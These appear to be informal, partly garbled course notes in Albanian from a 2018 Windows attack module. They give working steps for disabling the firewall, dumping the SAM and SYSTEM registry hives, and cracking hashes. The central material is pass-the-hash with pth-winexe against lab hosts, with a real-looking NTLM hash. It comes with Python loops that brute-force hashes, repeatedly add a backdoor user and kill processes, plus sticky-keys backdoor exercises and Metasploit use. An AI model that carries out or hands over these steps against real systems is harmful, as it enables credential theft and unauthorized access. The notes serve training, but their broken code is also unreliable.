30.04.2018 WINDOWS Module Day-1 Fokusi i modulit eshte me punu me CMD General Info: ku instalohet OS OS ? explorer? authentication: hash algorithms procesi i auth. lsass c = like root in linux dir = like ls cd = change directory system32 = app jane owned by vet systemit NT authority system32 = line /bin in linux Commands: C:\>.\calc C:\>ping google.com C:\> ping -n 10 google.com C:\> ping -n 10 google.com -l 1500 C:\> .\whoami C:\>ipconfig C:\>netstat Windows Firewall NE win7 C:\>netsh firewall set opmode disable C:\>netsh advfirewall ??? NE win10 NetSh Advfirewall set allprofiles state off ##To Turn Off: ##To Turn On: NetSh Advfirewall set allprofiles state on ##To check the status of Windows Firewall: Netsh Advfirewall show allprofiles Disa protocole: RDP SMB VNC easy acceess butoni ne login screen C:\>utilman.exe C:\Windows\System32\config> SAM file lokacioni ku ruhen passat, SYSTEM Ushtrime: verteto access ne internet / C:\>ping verteto cfar ip ka pc / C:\>ipconfig trego userat e sistemit local / C:\>net user trego userat e sistemit deri ne domain / C:\>net user /domain me shtu user/ C:\>net user testdr test /add privilaget / C:\>net user testdr ndrro passin / C:\>net user testdr newpass delete user / C:\>net user testdr /delete trego grupet / C:\>net localgroup shto user ne group / C:\>net localgroup administrators user /add stuxnet ##lloj sulmi usb robert ducky ##lloj usb qe e njeh si tastjer UAC = user account controle ## pop-up per run as Disable UAC ? Enable UAC ? https://hashkiller.co.uk/ ##site per hash files bashbanny ##usb tool, inject scripts locked lan TURTLE usb ##usb ##Export SAM and system file reg save hklm\sam c:\sam reg save hklm\system c:\system ##tool per mi hap sma and system files pwdump system sam (run in folder where sam and system file are located) ##################################################################################################### 02.05 ##################################################################################################### 04.05 ##################################################################################################### 07.05.2018 me win7 vector of the attack pass the hash 1. 1. sigurohu qe exist admin dhe eshte enabled 2. sugrohu qe useri admin ka pass 3. export db sam dhe sys dhe nxerrne hash e admmin 2. 1. kontrollo qe smb eshte hap ne target pc 2. kontrollo qe target pc eshte domain apo workgroup pasi qe pass dhe hash punon ne domain dhe local machine 3. identifiko pth-tool shkarkone, analizone 4. me njeran nga tools te pth realizo pass the hash dhe executo cmd ##################################################################################################### 9 maj 2018 Cd /Pth-toolkit 172.16.60.64 Porta 445 ./pth-winexe -U WORKGROUP/Administrator%LM:NTLM // 172. 16.60.64 cmd Nano ntlmauth.py Import os #import socket #Import sys #Form netaddr import IPNetwork # Import multiprocessing For i in open(‘hash.txt’,’r’); Hash=i.rstrip() Os.system(‘./pth-winexe –U W WORKGROUP/Administrator%{} // 172. 16.60.64 cmd’ .format(hash)) #Ip=sys.argv[1] #Port=445 #def connect(); #For i in IPNetwork(ip); #Print i #Try: #S= socket.socket(socket.AF_INET, socket, SOCK_STREAM) #s.settimeout(1) #r=s.connect_ex((str(i), 445)) #if r ==0; #os.system (‘./pth-winexe -U WORKGROUP/Administrator%LM:NTLM // 172. 16.60.64 cmd’) ose#print ‘{} TCP / 445 OPEN’, format(i) #except: #pass #def threading(): #Pool=threadpool(multiprocessing.cpu_count()) #Pool.map(connect, IPNetwork(sys.argv[1]) #Pool.close() #Pool.join() #if _main_==’_main_’: #Print ‘ ‘ #Threading() #Print ‘ ‘ #connect() Python ntlmauth.py Python ntlmauth.py 172.16.60.1/24 Lm : aad3b435b51404eeaad3b435b51404ee ./pth-winexe –U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634 //172.16.60.73 ‘net user q q /add’ Ose ‘taskkill /F /IM cmd.exe’ Cat fin.py Import time Import os While true: Os.system(./pth-winexe –U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634 //172.16.60.73 ‘net user q q /add’) Gjej nje wordlist me top 500 password dhe ktheje ne lm dhe ntlm hash. Lm: aad3b435b51404eeaad3b435b51404ee Kthimi i password ne ntlm: import hashlib,binascii hash = hashlib.new('md4', "password".encode('utf-16le')).digest() print binascii.hexlify(hash) import sys import hashlib,binascii for i in open(sys.argv[1]): i = i.rstrip() hash = hashlib.new('md4', i.encode('utf-16le')).digest() print binascii.hexlify(hash) python file.py wordlist.txt Bej nje script ne bash ose gjuhe tjeter per te lexuar secilin nga password derisa ta gjej passwordin dhe te autentifikohet. ./pth-winexe -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42 //172.16.60.64 cmd ##################################################################################################### 11 maj 2018 Tasklist – liston running processes Start Taskkill /F /PID 3420 Taskkill = Kill Dhe pkill Taskkill /F /IM cmd.exe – me kill every connection ne cmd (challenge i ores kaluar) Query user –tregon login user Tasklist Netstat – a Powershell – mqs ne cmd nuk na pershtatet Payload Sudo msfconsole Use exploit … Taskkill.exe /F /PID 3420 Linux Migrate –N notepad.exe Aplikacioni process explorer Ne Windows 7 - Administratorin me bo enable me i vene password dhe me i dhene password netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=/32 ##################################################################################################### Sfida 1 me shtu 5 usera 2 prej tyre me kon administrators me dokumentu nddrimin e passwordin dhe qysh me ndryshu kur password parametri nuk shhet Sfida 2 Me export sam dhe system me tentu mi lexu vlerat e hash me dokumentu Sfida 3 Sticky key me modifiku me nje applikacion qe nuk eshte cmd Sfida 4 me tentu me identifiku a exist nje porces ku ne windows ruhen logs, nese po qysh aktivizohet .##################################################################################################### WIN7 Disable/Enable SMB1 with PowerSHELL Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" SMB1 -Type DWORD -Value 0 –Force Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" SMB1 -Type DWORD -Value 1 -Force Disable/Enable SMB1 with Registry HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters 0 = Disabled 1 = Enabled Server 2012 and 2008 Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" SMB1 -Type DWORD -Value 0 –Force Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" SMB1 -Type DWORD -Value 1 –Force